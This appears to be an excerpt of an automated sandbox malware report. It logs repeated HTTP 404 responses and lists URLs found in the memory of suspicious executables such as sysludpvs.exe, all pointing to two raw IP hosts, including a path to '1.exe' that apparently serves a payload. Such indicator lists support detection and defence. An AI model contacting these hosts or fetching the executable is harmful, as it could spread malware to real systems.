    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:56:37 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:04 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:07 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:09 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:12 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:39 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global traffic
    HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Sun, 09 Mar 2025 12:57:42 GMT
    Content-Type: text/html
    Content-Length: 564
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:57:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: 230053364.exe, 00000001.00000000.1355937745.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000002.1387027346.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 230053364.exe, 00000001.00000003.1376701923.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000000.1376669342.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000002.00000002.3804337373.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://45.93.20.18/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/1
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2M/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/2f
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/4o
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/4t
    Source: sysludpvs.exe, 00000002.00000002.3804997354.00000000021AB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3/5
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/35I
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/39
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3E/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3W
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000061D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/3a/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/4
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/4O
    Source: sysludpvs.exe, 00000002.00000002.3804478092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/5
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.18/5o
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000007.00000000.1492018012.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe, 00000007.00000002.1513636166.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysludpvs.exe.1.dr, 230053364.exe.0.dr, newtpp[1].exe.0.drString found in binary or memory: http://91.202.233.141/
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
    Source: sysludpvs.exe, 00000002.00000002.3804478092.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1%
    Source: 152942395.exe, 152942395.exe, 00000005.00000002.2128797812.0000000001052000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1.exe
